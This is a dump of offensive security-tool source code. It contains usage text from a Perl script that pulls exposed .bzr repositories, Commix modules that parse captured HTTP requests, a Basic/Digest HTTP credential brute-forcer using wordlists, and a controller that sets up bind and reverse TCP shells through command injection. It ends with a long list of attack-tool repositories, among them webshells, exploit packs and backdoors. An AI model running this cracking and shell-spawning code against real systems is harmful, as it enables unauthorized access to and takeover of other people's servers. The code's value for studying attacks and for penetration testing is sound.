Distributed under GPL.\n\n"; 216 | print "Usage: $0 [options] -u [bzrurl] \n"; 217 | print "\n"; 218 | print " -c perform 'bzr revert' on end (default)\n"; 219 | print " -b Use branch (default: $config{'branch'})\n"; 220 | print " -a Use agent (default: $config{'agent'})\n"; 221 | print " -s do not verify SSL cert\n"; 222 | print " -p use proxy for connections\n"; 223 | print " -v verbose (-vv will be more verbose)\n"; 224 | print "\n"; 225 | print "Example: $0 -v -u http://www.example.com/.bzr/\n"; 226 | print "Example: $0 # with url and options in $configfile\n"; 227 | print "Example: $0 -v -u -p socks://localhost:1080 http://www.example.com/.bzr/\n"; 228 | print "For socks like proxy, make sure you have LWP::Protocol::socks\n"; 229 | 230 | exit 0; 231 | } 232 | 233 | -------------------------------------------------------------------------------- /commix/src/core/injections/controller/parser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import os 17 | import re 18 | import sys 19 | import time 20 | import base64 21 | import urllib 22 | import datetime 23 | 24 | from src.utils import menu 25 | from src.utils import settings 26 | 27 | from src.thirdparty.colorama import Fore, Back, Style, init 28 | 29 | """ 30 | Parse target and data from http proxy logs (i.e Burp or WebScarab) 31 | """ 32 | def logfile_parser(): 33 | """ 34 | Warning message for mutiple request in same log file. 
35 | """ 36 | def multi_requests(): 37 | print "[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]" 38 | warn_msg = "Multiple" 39 | if menu.options.requestfile: 40 | warn_msg += " requests" 41 | elif menu.options.logfile: 42 | warn_msg += " targets" 43 | warn_msg += " are not supported, thus all coming" 44 | if menu.options.requestfile: 45 | warn_msg += " requests " 46 | elif menu.options.logfile: 47 | warn_msg += " targets " 48 | warn_msg += "will be ignored." 49 | sys.stdout.write(settings.print_warning_msg(warn_msg) + "\n") 50 | sys.stdout.flush() 51 | return False 52 | 53 | """ 54 | Error message for invalid data. 55 | """ 56 | def invalid_data(request, single_request): 57 | if single_request: 58 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 59 | err_msg = "Something seems to be wrong with " 60 | err_msg += "the '" + os.path.split(request_file)[1] + "' file. " 61 | sys.stdout.write(settings.print_critical_msg(err_msg) + "\n") 62 | sys.stdout.flush() 63 | sys.exit(0) 64 | 65 | if menu.options.requestfile: 66 | request_file = menu.options.requestfile 67 | info_msg = "Parsing HTTP request " 68 | 69 | elif menu.options.logfile: 70 | request_file = menu.options.logfile 71 | info_msg = "Parsing target " 72 | 73 | info_msg += "using the '" + os.path.split(request_file)[1] + "' file... " 74 | sys.stdout.write(settings.print_info_msg(info_msg)) 75 | sys.stdout.flush() 76 | 77 | if not os.path.exists(request_file): 78 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 79 | err_msg = "It seems that the '" + request_file + "' file, does not exists." 
80 | sys.stdout.write(settings.print_critical_msg(err_msg) + "\n") 81 | sys.stdout.flush() 82 | sys.exit(0) 83 | 84 | else: 85 | # Check for multiple hosts 86 | request = open(request_file, "r") 87 | words_dict = {} 88 | for word in request.read().strip().splitlines(): 89 | if word[:4].strip() == "GET" or word[:4].strip() == "POST": 90 | words_dict[word[:4].strip()] = words_dict.get(word[:4].strip(), 0) + 1 91 | 92 | # Check if same header appears more than once. 93 | single_request = True 94 | if len(words_dict.keys()) > 1: 95 | single_request = multi_requests() 96 | for key in words_dict.keys(): 97 | if words_dict[key] > 1: 98 | single_request = multi_requests() 99 | 100 | # Check for GET / POST HTTP Header 101 | for http_header in ["GET","POST"]: 102 | request = open(request_file, "r") 103 | request = request.read() 104 | if "\\n" in request: 105 | request = request.replace("\\n","\n") 106 | request_url = re.findall(r"" + http_header + " (.*) ", request) 107 | 108 | if request_url: 109 | if not single_request: 110 | request_url = request_url[0] 111 | if http_header == "POST": 112 | # Check for POST Data. 113 | result = [item for item in request.splitlines() if item] 114 | menu.options.data = result[len(result)-1] 115 | else: 116 | try: 117 | # Check if url ends with "=". 
118 | if request_url[0].endswith("="): 119 | request_url = request_url[0].replace("=","=" + settings.INJECT_TAG, 1) 120 | except IndexError: 121 | invalid_data(request_file, single_request) 122 | break 123 | 124 | # Check if invalid data 125 | if not request_url: 126 | invalid_data(request_file, single_request) 127 | else: 128 | request_url = "".join([str(i) for i in request_url]) 129 | 130 | # Check for other headers 131 | extra_headers = "" 132 | prefix = "http://" 133 | for line in request.splitlines(): 134 | if re.findall(r"Host: " + "(.*)", line): 135 | menu.options.host = "".join([str(i) for i in re.findall(r"Host: " + "(.*)", line)]) 136 | # User-Agent Header 137 | elif re.findall(r"User-Agent: " + "(.*)", line): 138 | menu.options.agent = "".join([str(i) for i in re.findall(r"User-Agent: " + "(.*)", line)]) 139 | # Cookie Header 140 | elif re.findall(r"Cookie: " + "(.*)", line): 141 | menu.options.cookie = "".join([str(i) for i in re.findall(r"Cookie: " + "(.*)", line)]) 142 | # Referer Header 143 | elif re.findall(r"Referer: " + "(.*)", line): 144 | menu.options.referer = "".join([str(i) for i in re.findall(r"Referer: " + "(.*)", line)]) 145 | if menu.options.referer and "https://" in menu.options.referer: 146 | prefix = "https://" 147 | elif re.findall(r"Authorization: " + "(.*)", line): 148 | auth_provided = "".join([str(i) for i in re.findall(r"Authorization: " + "(.*)", line)]).split() 149 | menu.options.auth_type = auth_provided[0].lower() 150 | if menu.options.auth_type == "basic": 151 | menu.options.auth_cred = base64.b64decode(auth_provided[1]) 152 | elif menu.options.auth_type == "digest": 153 | if not menu.options.auth_cred: 154 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 155 | err_msg = "Use the '--auth-cred' option to provide a valid pair of " 156 | err_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") " 157 | print settings.print_critical_msg(err_msg) 158 | sys.exit(0) 159 | 160 | # Add extra headers 161 
| else: 162 | match = re.findall(r"(.*): (.*)", line) 163 | match = "".join([str(i) for i in match]).replace("', '",":") 164 | match = match.replace("('","") 165 | match = match.replace("')","\\n") 166 | # Ignore some header. 167 | if "Content-Length" or "Accept-Encoding" in match: 168 | extra_headers = extra_headers 169 | else: 170 | extra_headers = extra_headers + match 171 | 172 | # Extra headers 173 | menu.options.headers = extra_headers 174 | 175 | # Target URL 176 | if not menu.options.host: 177 | invalid_data(request_file, single_request) 178 | else: 179 | menu.options.url = prefix + menu.options.host + request_url 180 | if single_request: 181 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") 182 | sys.stdout.flush() 183 | if menu.options.logfile: 184 | info_msg = "Parsed target from '" + os.path.split(request_file)[1] + "' for tests :" 185 | print settings.print_info_msg(info_msg) 186 | print settings.SUB_CONTENT_SIGN + http_header + " " + prefix + menu.options.host + request_url 187 | if http_header == "POST": 188 | print settings.SUB_CONTENT_SIGN + "Data: " + menu.options.data 189 | #eof -------------------------------------------------------------------------------- /commix/src/core/requests/authentication.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 
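"""

import os
import sys
import time
import base64
import urllib2
import cookielib

from src.utils import menu
from src.utils import settings
from src.utils import session_handler

from src.core.requests import tor
from src.core.requests import proxy
from src.core.requests import headers
from src.core.requests import requests


from src.core.injections.controller import checks
from src.thirdparty.colorama import Fore, Back, Style, init

"""
If a dashboard or an administration panel is found (auth_url),
do the authentication process using the provided credentials (auth_data).
"""

"""
The authentication process

Requests `menu.options.auth_url` once without a body to collect any
cookies the server sets, stores them in `menu.options.cookie`, then
sends `menu.options.auth_data` to the same URL and returns the response
obtained through `requests.get_request_response`.
"""
def authentication_process():

  auth_url = menu.options.auth_url
  auth_data = menu.options.auth_data
  cj = cookielib.CookieJar()
  opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  # First request carries no data; its only purpose here is to fill the cookie jar.
  request = opener.open(urllib2.Request(auth_url))

  # Flatten the jar into a single "name=value; name=value; " header value.
  cookies = ""
  for cookie in cj:
    cookie_values = cookie.name + "=" + cookie.value + "; "
    cookies += cookie_values

  if len(cookies) != 0 :
    menu.options.cookie = cookies.rstrip()
    if settings.VERBOSITY_LEVEL >= 1:
      # NOTE(review): the session cookie is written to stdout in cleartext;
      # anything that captures the tool's output also captures the session.
      success_msg = "The received cookie is "
      success_msg += menu.options.cookie + Style.RESET_ALL + "."
      print settings.print_success_msg(success_msg)

  # install_opener() makes the cookie-aware opener the process-wide default
  # for later urllib2.urlopen() calls.
  urllib2.install_opener(opener)
  # A Request built with a data argument is sent as POST by urllib2.
  # NOTE(review): the credentials travel over whatever scheme auth_url uses;
  # nothing in this function checks that it is https.
  request = urllib2.Request(auth_url, auth_data)
  # Check if defined extra headers.
  headers.do_check(request)
  #headers.check_http_traffic(request)
  # Get the response of the request.
  response = requests.get_request_response(request)
  return response

"""
Define the HTTP authentication
wordlists for usernames / passwords.

Reads `settings.USERNAMES_TXT_FILE` and `settings.PASSWORDS_TXT_FILE`
line by line (each line stripped of surrounding whitespace) and returns
the two lists as a `(usernames, passwords)` tuple. A missing, empty or
unreadable file prints a critical message and exits the process.
"""
def define_wordlists():
  try:
    usernames = []
    if not os.path.isfile(settings.USERNAMES_TXT_FILE):
      err_msg = "The username file (" + settings.USERNAMES_TXT_FILE + ") is not found"
      print settings.print_critical_msg(err_msg)
      sys.exit(0)
    # The emptiness test has to look at the file, not at the length of the
    # path string: len() of a configured path is never 0, so the original
    # check could not fire.
    if os.path.getsize(settings.USERNAMES_TXT_FILE) == 0:
      err_msg = "The " + settings.USERNAMES_TXT_FILE + " file is empty."
      print settings.print_critical_msg(err_msg)
      sys.exit(0)
    with open(settings.USERNAMES_TXT_FILE, "r") as f:
      for line in f:
        line = line.strip()
        usernames.append(line)
  # os.path.getsize() reports failures as OSError, open() / read as IOError.
  except (IOError, OSError):
    err_msg = " Check if the " + settings.USERNAMES_TXT_FILE + " file is readable or corrupted."
    print settings.print_critical_msg(err_msg)
    sys.exit(0)

  try:
    passwords = []
    if not os.path.isfile(settings.PASSWORDS_TXT_FILE):
      err_msg = "The password file (" + settings.PASSWORDS_TXT_FILE + ") is not found" + Style.RESET_ALL
      print settings.print_critical_msg(err_msg)
      sys.exit(0)
    # Same fix as above: test the file size rather than the path length.
    if os.path.getsize(settings.PASSWORDS_TXT_FILE) == 0:
      err_msg = "The " + settings.PASSWORDS_TXT_FILE + " file is empty."
      print settings.print_critical_msg(err_msg)
      sys.exit(0)
    with open(settings.PASSWORDS_TXT_FILE, "r") as f:
      for line in f:
        line = line.strip()
        passwords.append(line)
  except (IOError, OSError):
    err_msg = " Check if the " + settings.PASSWORDS_TXT_FILE + " file is readable or corrupted."
    print settings.print_critical_msg(err_msg)
    sys.exit(0)

  return usernames, passwords

"""
Simple Basic / Digest HTTP authentication cracker.

Tries every username / password pair from the two wordlists against
`url` and returns "username:password" for the first pair whose request
does not raise, or False once the lists are exhausted.

Seen from the target, this is a single client sending many requests to
one URL, each with a different Authorization header and typically
answered with 401; per-source and per-account failure counting, lockout
and rate limiting are the controls that bound it.
"""
def http_auth_cracker(url, realm):
  # Define the HTTP authentication type.
  authentication_type = menu.options.auth_type
  # Define the authentication wordlists for usernames / passwords.
  usernames, passwords = define_wordlists()
  i = 1
  found = False
  total = len(usernames) * len(passwords)
  for username in usernames:
    for password in passwords:
      # Progress of the current attempt, formatted as a percentage string.
      float_percent = "{0:.1f}%".format(round(((i*100)/(total*1.0)),2))
      # Check if verbose mode on
      if settings.VERBOSITY_LEVEL >= 1:
        # NOTE(review): every candidate pair is written to stdout in cleartext.
        payload = "pair of credentials '" + username + ":" + password + "'"
        if settings.VERBOSITY_LEVEL > 1:
          print settings.print_checking_msg(payload)
        else:
          sys.stdout.write("\r" + settings.print_checking_msg(payload) + " ")
          sys.stdout.flush()
      try:
        # Basic authentication
        if authentication_type.lower() == "basic":
          request = urllib2.Request(url)
          base64string = base64.encodestring(username + ":" + password)[:-1]
          request.add_header("Authorization", "Basic " + base64string)
          headers.do_check(request)
          headers.check_http_traffic(request)
          result = urllib2.urlopen(request)
        # Digest authentication
        elif authentication_type.lower() == "digest":
          authhandler = urllib2.HTTPDigestAuthHandler()
          authhandler.add_password(realm, url, username, password)
          opener = urllib2.build_opener(authhandler)
          urllib2.install_opener(opener)
          request = urllib2.Request(url)
          headers.check_http_traffic(request)
          result = urllib2.urlopen(request)

        # NOTE(review): when authentication_type is neither "basic" nor
        # "digest" no request is sent, nothing raises, and the first pair
        # is recorded below as valid.
        # Store valid results to session
        admin_panel = url
        # NOTE(review): the username and password are handed to
        # session_handler as plain strings; presumably they are persisted
        # that way -- confirm against session_handler.
        session_handler.import_valid_credentials(url, authentication_type, admin_panel, username, password)
        found = True
      except KeyboardInterrupt :
        raise
      except:
        # Any other exception counts as a failed attempt, so a rejected pair
        # and a network or parsing error are indistinguishable here.
        pass
      if found:
        if not settings.VERBOSITY_LEVEL >= 1:
          float_percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
      else:
        if str(float_percent) == "100.0%":
          if not settings.VERBOSITY_LEVEL >= 1:
            float_percent = Fore.RED + "FAILED" + Style.RESET_ALL
        else:
          i = i + 1
      if not settings.VERBOSITY_LEVEL >= 1:
        info_msg = "Checking for a valid pair of credentials... [ " + float_percent + " ]"
        sys.stdout.write("\r\r" + settings.print_info_msg(info_msg))
        sys.stdout.flush()
      if found:
        valid_pair = "" + username + ":" + password + ""
        print ""
        success_msg = "Identified a valid pair of credentials '"
        success_msg += valid_pair + Style.RESET_ALL + Style.BRIGHT + "'."
        print settings.print_success_msg(success_msg)
        return valid_pair

  err_msg = "Use the '--auth-cred' option to provide a valid pair of "
  err_msg += "HTTP authentication credentials (i.e --auth-cred=\"admin:admin\") "
  err_msg += "or place an other dictionary into '"
  err_msg += os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'txt')) + "/' directory."
  print "\n" + settings.print_critical_msg(err_msg)
  return False

#eof
--------------------------------------------------------------------------------
/commix/src/core/injections/controller/shell_options.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# encoding: UTF-8

"""
This file is part of Commix Project (http://commixproject.com).
Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst).

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

For more see the file 'readme/COPYING' for copying permission.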
14 | """ 15 | 16 | import re 17 | import os 18 | import sys 19 | import time 20 | import urllib 21 | import urlparse 22 | 23 | from src.utils import menu 24 | from src.utils import settings 25 | 26 | from src.core.injections.controller import checks 27 | from src.thirdparty.colorama import Fore, Back, Style, init 28 | 29 | from src.core.shells import bind_tcp 30 | from src.core.shells import reverse_tcp 31 | from src.core.injections.results_based.techniques.classic import cb_injector 32 | from src.core.injections.results_based.techniques.eval_based import eb_injector 33 | 34 | """ 35 | Check for established connection 36 | """ 37 | def check_established_connection(): 38 | while True: 39 | if settings.VERBOSITY_LEVEL == 1: 40 | print "" 41 | warn_msg = "Something went wrong with the reverse TCP connection." 42 | warn_msg += " Please wait while checking state." 43 | print settings.print_warning_msg(warn_msg) 44 | time.sleep(10) 45 | lines = os.popen('netstat -anta').read().split("\n") 46 | found = False 47 | for line in lines: 48 | if "ESTABLISHED" in line and settings.LPORT in line.split(): 49 | found = True 50 | pass 51 | if not found: 52 | return 53 | 54 | """ 55 | Execute the bind / reverse TCP shell 56 | """ 57 | def execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option): 58 | if settings.EVAL_BASED_STATE != False: 59 | # Command execution results. 60 | start = time.time() 61 | response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) 62 | end = time.time() 63 | diff = end - start 64 | # Evaluate injection results. 65 | shell = eb_injector.injection_results(response, TAG, cmd) 66 | else: 67 | whitespace = settings.WHITESPACE[0] 68 | if whitespace == " ": 69 | whitespace = urllib.quote(whitespace) 70 | # Command execution results. 
71 | start = time.time() 72 | response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename) 73 | end = time.time() 74 | diff = end - start 75 | # Evaluate injection results. 76 | shell = cb_injector.injection_results(response, TAG, cmd) 77 | 78 | if settings.REVERSE_TCP and (int(diff) > 0 and int(diff) < 6): 79 | check_established_connection() 80 | else: 81 | if settings.VERBOSITY_LEVEL == 1: 82 | print "" 83 | 84 | err_msg = "The " + os_shell_option.split("_")[0] + " " 85 | err_msg += os_shell_option.split("_")[1].upper() + " connection has failed!" 86 | print settings.print_critical_msg(err_msg) 87 | 88 | """ 89 | Configure the bind TCP shell 90 | """ 91 | def bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again): 92 | settings.BIND_TCP = True 93 | # Set up RHOST / LPORT for the bind TCP connection. 
94 | bind_tcp.configure_bind_tcp() 95 | if settings.BIND_TCP == False: 96 | if settings.REVERSE_TCP == True: 97 | os_shell_option = "reverse_tcp" 98 | reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again) 99 | return go_back, go_back_again 100 | 101 | while True: 102 | if settings.RHOST and settings.LPORT in settings.SHELL_OPTIONS: 103 | result = checks.check_bind_tcp_options(settings.RHOST) 104 | else: 105 | cmd = bind_tcp.bind_tcp_options() 106 | result = checks.check_bind_tcp_options(cmd) 107 | if result != None: 108 | if result == 0: 109 | go_back_again = False 110 | elif result == 1 or result == 2: 111 | go_back_again = True 112 | settings.BIND_TCP = False 113 | elif result == 3: 114 | settings.BIND_TCP = False 115 | reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again) 116 | return go_back, go_back_again 117 | 118 | # execute bind TCP shell 119 | execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option) 120 | 121 | """ 122 | Configure the reverse TCP shell 123 | """ 124 | def reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again): 125 | settings.REVERSE_TCP = True 126 | # Set up LHOST / LPORT for the reverse TCP connection. 
127 | reverse_tcp.configure_reverse_tcp() 128 | if settings.REVERSE_TCP == False: 129 | if settings.BIND_TCP == True: 130 | os_shell_option = "bind_tcp" 131 | bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again) 132 | return go_back, go_back_again 133 | 134 | while True: 135 | if settings.LHOST and settings.LPORT in settings.SHELL_OPTIONS: 136 | result = checks.check_reverse_tcp_options(settings.LHOST) 137 | else: 138 | cmd = reverse_tcp.reverse_tcp_options() 139 | result = checks.check_reverse_tcp_options(cmd) 140 | if result != None: 141 | if result == 0: 142 | go_back_again = False 143 | elif result == 1 or result == 2: 144 | go_back_again = True 145 | settings.REVERSE_TCP = False 146 | elif result == 3: 147 | settings.REVERSE_TCP = False 148 | bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again) 149 | #reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again) 150 | return go_back, go_back_again 151 | 152 | # execute reverse TCP shell 153 | execute_shell(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option) 154 | 155 | """ 156 | Check commix shell options 157 | """ 158 | def check_option(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, technique, go_back, no_result, timesec, go_back_again): 159 | os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) 160 | 161 | if os_shell_option == "back" or os_shell_option == True or os_shell_option == False: 162 | go_back = True 163 | if os_shell_option == False: 164 | go_back_again = True 165 | return 
go_back, go_back_again 166 | 167 | # The "os_shell" option 168 | elif os_shell_option == "os_shell": 169 | warn_msg = "You are already into the '" + os_shell_option + "' mode." 170 | print settings.print_warning_msg(warn_msg) 171 | return go_back, go_back_again 172 | 173 | # The "bind_tcp" option 174 | elif os_shell_option == "bind_tcp": 175 | go_back, go_back_again = bind_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again) 176 | return go_back, go_back_again 177 | 178 | # The "reverse_tcp" option 179 | elif os_shell_option == "reverse_tcp": 180 | go_back, go_back_again = reverse_tcp_config(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename, os_shell_option, go_back, go_back_again) 181 | return go_back, go_back_again 182 | 183 | # The "quit" option 184 | elif os_shell_option == "quit": 185 | sys.exit(0) 186 | 187 | else: 188 | return go_back, go_back_again 189 | 190 | -------------------------------------------------------------------------------- /sohaip-hackerDZ/tools/list.txt: -------------------------------------------------------------------------------- 1 | git://git.kali.org/packages/ace-voip.git 2 | git://git.kali.org/packages/amap.git 3 | git://git.kali.org/packages/cisco-auditing-tool.git 4 | git://git.kali.org/packages/cisco-global-exploiter.git 5 | git://git.kali.org/packages/cisco-ocs.git 6 | git://git.kali.org/packages/cisco-torch.git 7 | https://bitbucket.org/LaNMaSteR53/recon-ng 8 | https://github.com/0xd4d/dnSpy 9 | https://github.com/1aN0rmus/TekDefense-Automater 10 | https://github.com/1N3/Findsploit 11 | https://github.com/1N3/Sn1per 12 | https://github.com/4shadoww/hakkuframework 13 | https://github.com/adaptivethreat/Empire 14 | https://github.com/AeonDave/doork 15 | https://github.com/aircrack-ng/aircrack-ng 16 | 
https://github.com/ajinabraham/Mobile-Security-Framework-MobSF 17 | https://github.com/AlisamTechnology/ATSCAN 18 | https://github.com/allfro/sploitego 19 | https://github.com/andresriancho/w3af 20 | https://github.com/aol/moloch 21 | https://github.com/appknox/AFE 22 | https://github.com/Arachni/arachni 23 | https://github.com/Aralhach/bashobfus 24 | https://github.com/b3mb4m/shellsploit-framework 25 | https://github.com/bartobri/no-more-secrets 26 | https://github.com/beefproject/beef 27 | https://github.com/BlackArch/rainbowcrack 28 | https://github.com/blindfuzzy/LHF 29 | https://github.com/bounteous/libenom 30 | https://github.com/BRDumps/extract-hashes 31 | https://github.com/BreakingMalwareResearch/atom-bombing 32 | https://github.com/byt3bl33d3r/chrome-decrypter 33 | https://github.com/byt3bl33d3r/pth-toolkit 34 | https://github.com/certsocietegenerale/FIR 35 | https://github.com/certtools/intelmq 36 | https://github.com/Cewlt/SkypeMass 37 | https://github.com/chaitin/sqlchop 38 | https://github.com/chinoogawa/fbht 39 | https://github.com/cloughrm/Pastebin-Scraper 40 | https://github.com/commixproject/commix 41 | https://github.com/cxdy/pybomber 42 | https://github.com/D35m0nd142/Kadabra 43 | https://github.com/danielmiessler/SecLists 44 | https://github.com/DanMcInerney/shellshock-hunter 45 | https://github.com/DanMcInerney/shellshock-hunter-google 46 | https://github.com/DanMcInerney/wifijammer 47 | https://github.com/darkoperator/dnsrecon 48 | https://github.com/ddos-defense/bohatei 49 | https://github.com/desaster/kippo 50 | https://github.com/devttys0/binwalk 51 | https://github.com/digininja/CeWL 52 | https://github.com/Dionach/CMSmap 53 | https://github.com/dloss/python-pentest-tools 54 | https://github.com/DoddyHackman/Arsenal_X 55 | https://github.com/DominikSchlecht/pyDirBuster 56 | https://github.com/dotfighter/torshammer 57 | https://github.com/dripcap/dripcap 58 | https://github.com/EgeBalci/The-Eye 59 | 
https://github.com/EnableSecurity/wafw00f 60 | https://github.com/endgameinc/binarypig 61 | https://github.com/epinna/weevely3 62 | https://github.com/Ettercap/ettercap 63 | https://github.com/evilsocket/bettercap 64 | https://github.com/ex0dus-0x/brut3k1t 65 | https://github.com/ex0dus-0x/dedsploit 66 | https://github.com/fgeek/pyfiscan 67 | https://github.com/foospidy/HoneyPy 68 | https://github.com/frdmn/findmyhash 69 | https://github.com/g0tmi1k/mpc 70 | https://github.com/gabrielrcouto/reaver-wps 71 | https://github.com/Gallopsled/pwntools 72 | https://github.com/gamelinux/passivedns 73 | https://github.com/GDSSecurity/Windows-Exploit-Suggester 74 | https://github.com/georgiaw/Smartphone-Pentest-Framework 75 | https://github.com/google/grr 76 | https://github.com/google/rowhammer-test 77 | https://github.com/google/stenographer 78 | https://github.com/googleinurl/SCANNER-INURLBR 79 | https://github.com/GouveaHeitor/nipe 80 | https://github.com/graniet/chromebackdoor 81 | https://github.com/HackerOrientado/BypassCF 82 | https://github.com/hahwul/droid-hunter 83 | https://github.com/hashcat/hashcat 84 | https://github.com/hatRiot/clusterd 85 | https://github.com/hatRiot/zarp 86 | https://github.com/hellman/xortool 87 | https://github.com/HiroshiManRise/anonym8 88 | https://github.com/Hood3dRob1n/BinGoo 89 | https://github.com/huntergregal/scansploit 90 | https://github.com/hvqzao/liffy 91 | https://github.com/Hypsurus/weeman 92 | https://github.com/infobyte/evilgrade 93 | https://github.com/j91321/rext 94 | https://github.com/jaromil/HasciiCam 95 | https://github.com/jh00nbr/Routerhunter-2.0 96 | https://github.com/JoeDog/siege 97 | https://github.com/JohnTroony/php-webshells 98 | https://github.com/JPaulMora/Pyrit 99 | https://github.com/jsvine/waybackpack 100 | https://github.com/juansacco/exploitpack 101 | https://github.com/Jumpst3r/AsciiToDucky 102 | https://github.com/k4m4/onioff 103 | https://github.com/kevthehermit/dc-toolkit 104 | 
https://github.com/kevthehermit/RATDecoders 105 | https://github.com/knownsec/Pocsuite 106 | https://github.com/korczis/foremost 107 | https://github.com/kurobeats/fimap 108 | https://github.com/lanjelot/patator 109 | https://github.com/leebaird/discover 110 | https://github.com/lhr0909/PythonObfuscator 111 | https://github.com/liftoff/pyminifier 112 | https://github.com/lightbulb-framework/lightbulb-framework 113 | https://github.com/luisgg/ophcrack 114 | https://github.com/m0nad/HellRaiser/ 115 | https://github.com/m3pt0r/l0l 116 | https://github.com/magnumripper/JohnTheRipper 117 | https://github.com/marshyski/sshwatch 118 | https://github.com/merculite/BLE-Security 119 | https://github.com/micahflee/onionshare 120 | https://github.com/mikeryan/crackle 121 | https://github.com/misterch0c/malSploitBase 122 | https://github.com/mitmproxy/mitmproxy 123 | https://github.com/mthbernardes/EvilTool 124 | https://github.com/nbs-system/naxsi 125 | https://github.com/nmap/nmap 126 | https://github.com/NORMA-Inc/AtEar 127 | https://github.com/OsandaMalith/LFiFreak/ 128 | https://github.com/P0cL4bs/Kadimus 129 | https://github.com/ParrotSec/car-hacking-tools 130 | https://github.com/PenturaLabs/Linux_Exploit_Suggester 131 | https://github.com/praetorian-inc/Hob0Rules 132 | https://github.com/psypanda/hashID 133 | https://github.com/r00t-3xp10it/morpheus 134 | https://github.com/radare/radare2 135 | https://github.com/rafael-santiago/pig 136 | https://github.com/ReclaimYourPrivacy/eschalot 137 | https://github.com/reverse-shell/routersploit 138 | https://github.com/reyammer/shellnoob 139 | https://github.com/rezasp/joomscan 140 | https://github.com/rezasp/vbscan 141 | https://github.com/rfunix/Pompem 142 | https://github.com/rsmudge/armitage 143 | https://github.com/s3inlc/holm 144 | https://github.com/SafeStack/ava 145 | https://github.com/SageHack/cloud-buster 146 | https://github.com/SageHack/cloudflare-resolver 147 | https://github.com/samratashok/Kautilya 148 | 
https://github.com/samratashok/nishang 149 | https://github.com/savio-code/ghost-phisher 150 | https://github.com/Screetsec/Brutal 151 | https://github.com/Screetsec/Dracnmap 152 | https://github.com/Screetsec/TheFatRat 153 | https://github.com/SECFORCE/sparta 154 | https://github.com/secretsquirrel/the-backdoor-factory/ 155 | https://github.com/securestate/termineter 156 | https://github.com/seifreed/dirb 157 | https://github.com/sensepost/DET 158 | https://github.com/sensepost/kwetza 159 | https://github.com/sensepost/xrdp 160 | https://github.com/shawarkhanethicalhacker/D-TECT 161 | https://github.com/simsong/tcpflow 162 | https://github.com/sleuthkit/autopsy 163 | https://github.com/sleuthkit/sleuthkit 164 | https://github.com/sophron/wifiphisher 165 | https://github.com/SpiderLabs/jboss-autopwn 166 | https://github.com/suraj-root/spade 167 | https://github.com/tcstool/fireaway 168 | https://github.com/tcstool/NoSQLMap 169 | https://github.com/TheRook/subbrute 170 | https://github.com/thesp0nge/dawnscanner 171 | https://github.com/timwr/CVE-2016-5195 172 | https://github.com/tnich/honssh 173 | https://github.com/tomac/yersinia 174 | https://github.com/trustedsec/ptf 175 | https://github.com/TryCatchHCF/Cloakify 176 | https://github.com/ufrisk/pcileech 177 | https://github.com/urbanadventurer/WhatWeb 178 | https://github.com/USArmyResearchLab/Dshell 179 | https://github.com/v3n0m-Scanner/V3n0M-Scanner 180 | https://github.com/vk496/linset 181 | https://github.com/volatilityfoundation/volatility 182 | https://github.com/vusec/drammer 183 | https://github.com/vvalien/SharpMeter 184 